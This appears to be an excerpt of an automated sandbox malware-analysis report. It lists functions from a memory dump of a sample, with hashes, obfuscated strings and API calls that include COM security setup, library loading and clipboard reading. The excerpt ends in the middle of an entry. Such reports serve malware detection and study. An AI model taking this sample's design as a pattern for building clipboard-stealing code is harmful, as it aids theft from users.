Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 0046cf233a04f666e046a8942aafcc65fc15f121ba2ede59dbe27c9056b82463
Instruction ID: 29d99acc610b5d3137d603d3fa550a4aa90b4681a32c7496636825256376b077
Opcode Fuzzy Hash: 0046cf233a04f666e046a8942aafcc65fc15f121ba2ede59dbe27c9056b82463
Instruction Fuzzy Hash: 864159726043109BD7248F64DC95BBBBBA2FFE4318F09462DE5855B3A0E779AC00C782

Function 0079B922 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

\^, xrefs: 0079B97A

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: \^
API String ID: 0-805220809
Opcode ID: beb7ae3c443ba31947fd612fd4ce57dac988dd6e76cfcea8b565407adc3b6d51
Instruction ID: 8aafd77e155dfd9df1d1034cdab3936efae2a3317763f2657e2b5dc6e5ce75bb
Opcode Fuzzy Hash: beb7ae3c443ba31947fd612fd4ce57dac988dd6e76cfcea8b565407adc3b6d51
Instruction Fuzzy Hash: CC210272E402268BC710CF64D8807AAB7F2BB89320F298168C681B7245D774AC02CB94

Function 007CE110 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0011ee2d399c06018ee09b0c3442990dcab529055946b56a9fef2a01dad725d4
Instruction ID: 7f7d7b03e6af0212f03c6e3e50ea4db07c6efba40028a8d867eac95389d58e1f
Opcode Fuzzy Hash: 0011ee2d399c06018ee09b0c3442990dcab529055946b56a9fef2a01dad725d4
Instruction Fuzzy Hash: A2A14B76A157519BC714DF29CC80A6AB7A3FBD4720F09C63DE885872A5EB38EC11C781

Function 007C9A70 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ebb05080e044a0f377f6f689aaf1da0292eed93c723edb11ab42a6437da8562
Instruction ID: d36a60bd1192ae4ee8ae2f4f471c8b28bcb8592f07afd7835769dbb7e615dd9b
Opcode Fuzzy Hash: 8ebb05080e044a0f377f6f689aaf1da0292eed93c723edb11ab42a6437da8562
Instruction Fuzzy Hash: 54715A7AA083209BD7249E399884B7BB3D2EBC4710F1AC23DDAC667341EA349C01C795

Function 007B7380 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f4bc2de2f548a572877900267c9d3805c25a011ce692dcb33d236043bd1ae378
Instruction ID: e9dca81d120ad8ce52226ff4c95073abdff0aa119f6144efd0b4e001a93f715d
Opcode Fuzzy Hash: f4bc2de2f548a572877900267c9d3805c25a011ce692dcb33d236043bd1ae378
Instruction Fuzzy Hash: 80713D7160C3415BDB289F249C827BBB7A5EFD2315F18842CE98597252F23CEC16C352

Function 0079C826 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0079C82A
CoInitializeEx.COMBASE(00000000,00000002), ref: 0079C979

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 55c70858291e14c3e7768db880e741ef2158e95cfd853dcc360a8075638ee975
Instruction ID: cadd6b3701a1c7cde4e6c4c130e2eeed542f12a3f2a15ea5f6491535e1ad74b7
Opcode Fuzzy Hash: 55c70858291e14c3e7768db880e741ef2158e95cfd853dcc360a8075638ee975
Instruction Fuzzy Hash: 9041E7B4910B40AFD370EF39D90B7137EB4AB05250F508B1EF8EA866D4E631A4198BD7

Function 007CB550 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0079B03C,00000000,00000001), ref: 007CB582

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cef86456ce2bf84915d9e37a58192b524c8012b37bb2c1137062b718e22d8ce5
Instruction ID: 04eff10fc0ebd8236e3e548198dc318e1bbfebb9625e193f43a90a04a98a60e7
Opcode Fuzzy Hash: cef86456ce2bf84915d9e37a58192b524c8012b37bb2c1137062b718e22d8ce5
Instruction Fuzzy Hash: 1BE0E532525520EBC3101B38BC0AF2B3778AF85710F09442DF505A6110EB3DE811C5A5

Function 007C0363 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 007C03AC

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 5283d5d2577f8fa219b4f457039c011edd00f15148ae6b4181a576588ca3f236
Instruction ID: 28d5742eedd83a5f4e1564f7a9a3f96ae276ab72dcd98b181cd16a57e1e62504
Opcode Fuzzy Hash: 5283d5d2577f8fa219b4f457039c011edd00f15148ae6b4181a576588ca3f236
Instruction Fuzzy Hash: 30F0BDB46057018FE344DF25D5A871ABBF1FB94308F10991CE4958B350C7B9A949CF81

Function 007C1CF1 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 007C1D3A

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: b1c8b4d3e47a13fac2e5e2cc39d7248283aa9c0487a44a8b907896777dc6f027
Instruction ID: f71b812bf27d0140353ed7b30fb08cc3ae02edc8ea99d460c21310fa12249cf9
Opcode Fuzzy Hash: b1c8b4d3e47a13fac2e5e2cc39d7248283aa9c0487a44a8b907896777dc6f027
Instruction Fuzzy Hash: 21F0B7701093019FE314DF60D1A870BBBE2ABC8318F10890CE0940B390C7BA96498F82

Function 0079C9B5 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0079C9C7

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: ac47685d4175cc390f71f0476b9edb39e65b3932afe3c0e9b383f88b14df3455
Instruction ID: 1026ae893df6db1da9f60d93c76c37099c29e977b043d053ff04deb8bbcffd9d
Opcode Fuzzy Hash: ac47685d4175cc390f71f0476b9edb39e65b3932afe3c0e9b383f88b14df3455
Instruction Fuzzy Hash: FAD092703C92407AE1644A08AD27F143761A311F15F344606B3A3EE2E1C9D47112860C

Function 007C9A42 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 007C9A5D

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a4e656ee5fa60cbb84e82d3f001b771c0d3069a42eb482a727989c854b8b6085
Instruction ID: f25654293a4e4376dec4fe3b7ec9a515889e588eb4964e98e7ae5b78093501d4
Opcode Fuzzy Hash: a4e656ee5fa60cbb84e82d3f001b771c0d3069a42eb482a727989c854b8b6085
Instruction Fuzzy Hash: 66C01232116826EBC6612B18BC0ABD62B25AF04321F068991F1089C0A5D63C8CA28998

Non-executed Functions

Function 007B7670 Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 275COMMON

Download Yara Rule

Strings

#V2h, xrefs: 007B7E01
`>~0, xrefs: 007B7D96
q&u8, xrefs: 007B7D86
P:W<, xrefs: 007B7D8E
0R/T, xrefs: 007B7DF6
GI, xrefs: 007B7EE7
h.h , xrefs: 007B7D76
x"p$, xrefs: 007B7D7E
l6iH, xrefs: 007B7DA9
E*y,, xrefs: 007B7E3C
ef, xrefs: 007B7E2D
r2k4, xrefs: 007B7D9E
KM, xrefs: 007B7EEF

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: #V2h$0R/T$E*y,$P:W<$`>~0$ef$h.h $l6iH$q&u8$r2k4$x"p$$GI$KM
API String ID: 0-2276481665
Opcode ID: a8e63a5f31e508353695972cde312912c94a6556244fc881841ebd875ede47b9
Instruction ID: 4c8a5975e50e0a46434f67ee38141a03d429955a3c8bc980b4c763b4c869bfbb
Opcode Fuzzy Hash: a8e63a5f31e508353695972cde312912c94a6556244fc881841ebd875ede47b9
Instruction Fuzzy Hash: B691BAB561C3848FC7249F29D842BABBBF1EFC1304F05895CE5C49B251EB798905CB96

Function 00798FE0 Relevance: 15.4, Strings: 12, Instructions: 397COMMON

Download Yara Rule

Strings

gnbY, xrefs: 0079901D
x, xrefs: 0079930C
jFPd, xrefs: 00799005
JRj5, xrefs: 0079937E, 007992F4
0;, xrefs: 0079903D
;}e;, xrefs: 007990F1
04:5, xrefs: 007990F9
Rfka, xrefs: 00799015
}, xrefs: 0079918F
aOe , xrefs: 00799139
JRj5, xrefs: 00799174
&!, xrefs: 00799188

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: &!$04:5$0;$;}e;$JRj5$JRj5$Rfka$aOe $gnbY$jFPd$x$}
API String ID: 0-910685465
Opcode ID: 9cb759d489f57a9e6b297dd318a3997337be23c4bef80ff73e1fefe4e661577e
Instruction ID: b7a577c28a1e2f75c30c67f8f33356bd2a88b12f99cb7f417784ea25fc56d4c4
Opcode Fuzzy Hash: 9cb759d489f57a9e6b297dd318a3997337be23c4bef80ff73e1fefe4e661577e
Instruction Fuzzy Hash: CCA1D17114C3919BD722CF6994A035BFFE0AF97740F584A6CE4D55B382D339890AC7A2

Function 007BC190 Relevance: 15.3, Strings: 12, Instructions: 263COMMON

Download Yara Rule

Strings

8g~[, xrefs: 007BC396
r, xrefs: 007BC3D7
:, xrefs: 007BC268
4)'$, xrefs: 007BC354
Z,37, xrefs: 007BC38B
-V($, xrefs: 007BC35F
2*'7, xrefs: 007BC349
i1||, xrefs: 007BC2C5
5Vdw, xrefs: 007BC380
ips~, xrefs: 007BC2E6
\$?>, xrefs: 007BC375
qez), xrefs: 007BC1B7

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: -V($$2*'7$4)'$$5Vdw$8g~[$:$Z,37$\$?>$i1||$ips~$qez)$r
API String ID: 0-2291961604
Opcode ID: c313e175e9847ac144540d12d4342f7d727fdb9525b9356b0540b11206b25c25
Instruction ID: 7ab2a9f780c8040cbf013d6cd0fec3ca68be7467d11764c001cd8bc83b2731e8
Opcode Fuzzy Hash: c313e175e9847ac144540d12d4342f7d727fdb9525b9356b0540b11206b25c25
Instruction Fuzzy Hash: 4481DEB160C3D18BE335CF2594A17ABBFE2AFD2304F18895CC4DA5B246D6790506CBA7

Function 007B7690 Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 683COMMON

Download Yara Rule

Strings

H)#<, xrefs: 007B7763
bx{, xrefs: 007B782E, 007B7850
GI, xrefs: 007B7EE7
D$ 7, xrefs: 007B775B
=B'+, xrefs: 007B7753
KM, xrefs: 007B7EEF

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: =B'+$D$ 7$H)#<$bx{$GI$KM
API String ID: 0-221937381
Opcode ID: 5849352fa781deb41a31238ac3f10c355f8b5ce4df74b3eaac8e25cc06da841e
Instruction ID: 94449881168b9199f1d9f34a01bcb117100aeaf95456aed58a5c20674fc5cc4f
Opcode Fuzzy Hash: 5849352fa781deb41a31238ac3f10c355f8b5ce4df74b3eaac8e25cc06da841e
Instruction Fuzzy Hash: 27220DB160C381CFC7249F64E8817ABBBE1AFD6304F04892CE5C58B352E7799905CB96

Function 007C27A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 121clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 007C27B0
GetClipboardData.USER32 ref: 007C27CB
GlobalLock.KERNEL32 ref: 007C27EA
GlobalUnlock.KERNEL32 ref: 007C2928
CloseClipboard.USER32 ref: 007C2931

Strings

+, xrefs: 007C285F

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID: +
API String ID: 1006321803-2126386893
Opcode ID: e12e0e78b05a05740bc418b8e954cac4995d976f7aa6196664e715af3c8f9495
Instruction ID: 36ac429e7a29123ee9a3dbcb01a169aa3585a836ef188f220598aee5fbae8e18
Opcode Fuzzy Hash: e12e0e78b05a05740bc418b8e954cac4995d976f7aa6196664e715af3c8f9495
Instruction Fuzzy Hash: 66419D7160D381CFD305AFB8D98935EBFE1AB96304F09892DE4C58A382D67C854997A3

Function 007993C0 Relevance: 11.6, Strings: 9, Instructions: 370COMMON

Download Yara Rule

Strings

m~qF, xrefs: 0079957A
F771030F9526602D0EE189CCD4D6D92A, xrefs: 007994AA
Bq, xrefs: 007996BF
"#, xrefs: 007997B3
Qv, xrefs: 007996A7
2E, xrefs: 007996B7
yp, xrefs: 007996AF
}J~u, xrefs: 007995A5
~, xrefs: 00799618

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: "#$2E$Bq$F771030F9526602D0EE189CCD4D6D92A$Qv$m~qF$yp$}J~u$~
API String ID: 0-3532175288
Opcode ID: 43a7f2524aee836279ec4469d0adc5871172dd2be15f3e516ea982b6075738bd
Instruction ID: ea39a429bc014e95f7aa9cc5882ee73c56bd8a15b59abad8815335a5b45f31ff
Opcode Fuzzy Hash: 43a7f2524aee836279ec4469d0adc5871172dd2be15f3e516ea982b6075738bd
Instruction Fuzzy Hash: 3EB1247160C7408BDB14CF24D891AABBBE1EBC2314F14496CE5D58B392DB3DD90ACB56

Function 007AE870 Relevance: 10.9, Strings: 8, Instructions: 907COMMON

Download Yara Rule

Strings

!2:*, xrefs: 007AEC5A
5878, xrefs: 007AEC65
), xrefs: 007AEA95
EFp%, xrefs: 007AEAE0
}, xrefs: 007AF242
-, xrefs: 007AEFA4
FF, xrefs: 007AF23B
PP-*, xrefs: 007AEC7B

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: !2:*$)$-$5878$EFp%$FF$PP-*$}
API String ID: 0-1482250269
Opcode ID: d49ed610e2b5b9f2afb54b676f85b3de2ed6ffd0ff0e1b417e923b3fb4b91375
Instruction ID: f842d88070908a0c2b91e88b63a8716b86fd09cb58c436fb7820147cd6a17efc
Opcode Fuzzy Hash: d49ed610e2b5b9f2afb54b676f85b3de2ed6ffd0ff0e1b417e923b3fb4b91375
Instruction Fuzzy Hash: 8752287550C3908FC725CF24C891A6FBBE2AFD6304F18866DE8D59B392E7399805CB52

Function 007BD244 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 280libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(9F2D9D29,00000000,00000800), ref: 007BD6AC

Strings

EmQu, xrefs: 007BD5E1
pq, xrefs: 007BD64E
OZlk, xrefs: 007BD42B
8, xrefs: 007BD4FE
7, xrefs: 007BD5A4

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: LibraryLoad
String ID: 7$8$EmQu$OZlk$pq
API String ID: 1029625771-859822191
Opcode ID: 1a0a9ba5fa6ccf1d8ba5c1e08973c55cad240f927b34ddbbb08728781530c4b0
Instruction ID: 45ba500a3f91d70c1491f1e47411cfdf0515ec720239187d5d9d18ac9ad1acdf
Opcode Fuzzy Hash: 1a0a9ba5fa6ccf1d8ba5c1e08973c55cad240f927b34ddbbb08728781530c4b0
Instruction Fuzzy Hash: 5481F77060C3D18BE3388B3984617EBBBD19F93314F28896DD4D98B392EA7D5809C752

Function 007BD2CF Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 278COMMON

Download Yara Rule

Strings

EmQu, xrefs: 007BD5E1
pq, xrefs: 007BD64E
OZlk, xrefs: 007BD42B
8, xrefs: 007BD4FE
7, xrefs: 007BD5A4

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: 7$8$EmQu$OZlk$pq
API String ID: 0-859822191
Opcode ID: 8802dc920b77d13982c00e3c54bbde0ac025416e49ddf1288280c2184b7df96f
Instruction ID: 45b602afe8d89cfa397e4ba2f329b92e0d54a4ef55a71152f3c1e4e3ec3d9eaf
Opcode Fuzzy Hash: 8802dc920b77d13982c00e3c54bbde0ac025416e49ddf1288280c2184b7df96f
Instruction Fuzzy Hash: 6381E77060C3D18BE3398B3984617EBBBD19F93314F18896DD4D98B392EA7D5809C752

Function 007BD333 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 277COMMON

Download Yara Rule

Strings

EmQu, xrefs: 007BD5E1
pq, xrefs: 007BD64E
OZlk, xrefs: 007BD42B
8, xrefs: 007BD4FE
7, xrefs: 007BD5A4

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: 7$8$EmQu$OZlk$pq
API String ID: 0-859822191
Opcode ID: ec4bb49bb568de66e215ebe4feddd760154d11a0b2caa77608cfa43b06ea23ec
